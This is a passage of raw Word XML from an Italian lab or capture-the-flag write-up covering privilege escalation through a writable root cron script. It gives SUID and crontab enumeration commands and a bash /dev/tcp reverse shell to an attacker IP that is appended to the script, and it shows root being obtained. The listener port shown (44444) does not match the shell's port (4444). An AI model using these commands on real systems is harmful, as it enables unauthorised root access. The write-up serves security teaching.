        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sono stati ricercati eventuali file con bit SUID impostato, potenziale vettore di escalation tramite binari eseguibili con i privilegi del proprietario:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table21"/>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CE">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stato effettuato un controllo dei processi in esecuzione e, elemento risultato decisivo, del contenuto del file crontab di sistema:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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D0">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ps aux</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nsolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/crontab</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati ottenuti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'analisi del crontab di sistema ha rivelato la presenza di un job pianificato per l'esecuzione automatica, ogni minuto, con i privilegi dell'utente root:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table23"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="952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D4">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">* * * * * root /usr/local/bin/cleanup</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi e interpretazione dei risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il job di cron individuato rappresenta un potenziale vettore di privilege escalation ad alto impatto: se lo script /usr/local/bin/cleanup, o la directory che lo contiene, risultasse scrivibile da parte dell'utente www-data, sarebbe possibile modificarne il contenuto e ottenere l'esecuzione di codice arbitrario con privilegi di root al successivo ciclo di cron (con una latenza massima di un minuto). Questo scenario è stato pertanto verificato nella fase successiva.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Fase 5: Privilege Escalation — Sfruttamento del Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della fase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificare i permessi del file /usr/local/bin/cleanup e, in caso di scrittura consentita, sfruttare l'esecuzione automatica pianificata per ottenere una shell con privilegi di root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strumenti utilizzati</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Shell Bash (sessione www-data già ottenuta)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Netcat — secondo listener per la ricezione della shell privilegiata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedura eseguita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stata verificata l'effettiva scrivibilità del file da parte dell'utente corrente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table24"/>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E0">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la /usr/local/bin/cleanup</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confermata la possibilità di scrittura, il contenuto dello script è stato sostituito (in alternativa, se il file non fosse risultato scrivibile ma lo fosse stata la directory, sarebbe stato possibile rinominare il file originale e sostituirlo integralmente) con istruzioni per l'apertura di una nuova reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table25"/>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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="957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E2">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo '#!/bin/bash' &gt; /usr/local/bin/cleanup</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo 'bash -i &gt;&amp; /dev/tcp/192.168.1.10/4444 0&gt;&amp;1' &gt;&gt; /usr/local/bin/cleanup</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod +x /usr/local/bin/cleanup</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In alternativa, qualora si fosse preferito preservare la funzionalità originaria dello script, sarebbe stato sufficiente accodare il comando di reverse shell al file esistente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table26"/>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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="966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E6">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">echo 'bash -i &gt;&amp; /dev/tcp/192.168.1.10/4444 0&gt;&amp;1' &gt;&gt; /usr/local/bin/cleanup</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sulla macchina di attacco è stato quindi avviato un secondo listener Netcat, in attesa della connessione privilegiata:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table27"/>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20"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="912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E8">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -lvnp 44444</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poiché il job di cron individuato nella Fase 4 viene eseguito automaticamente ogni minuto con privilegi di root, è stato sufficiente attendere il successivo ciclo di esecuzione pianificata.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati ottenuti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allo scadere del minuto, lo script modificato è stato eseguito automaticamente dal demone cron con privilegi di root, aprendo una nuova connessione di shell verso il listener in ascolto sulla macchina di attacco, questa volta con privilegi di amministratore di sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi e interpretazione dei risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il vettore sfruttato è un classico caso di privilege escalation basato su un job di cron insicuro: l'esecuzione automatica e periodica di uno script con privilegi elevati, combinata con permessi di scrittura non adeguatamente ristretti sul file o sulla directory che lo contiene, consente a un utente non privilegiato di ottenere l'esecuzione di codice arbitrario con i privilegi dell'account sotto cui il job è pianificato — in questo caso, root. Questo tipo di configurazione errata è particolarmente insidioso poiché spesso introdotto per finalità di manutenzione (pulizia di file temporanei, log rotation, ecc.) senza un'adeguata attenzione ai permessi del file eseguito.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 Fase 6: Post-Exploitation Root e Acquisizione della Flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della fase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confermare l'ottenimento dei privilegi di root e acquisire la prova finale del completamento dell'attività (flag), a validazione dell'intero percorso di compromissione.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strumenti utilizzati</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Shell Bash con privilegi root (sessione ottenuta nella Fase 5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedura eseguita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sulla nuova sessione ottenuta è stata verificata l'identità dell'utenza attiva:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table28"/>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F5">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># root</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">id</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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># uid=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">È stata quindi esplorata la home directory dell'utente root e recuperato il file contenente la prova di compromissione:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table29"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="889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0FB">
            <w:pPr>
              <w:spacing w:after="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
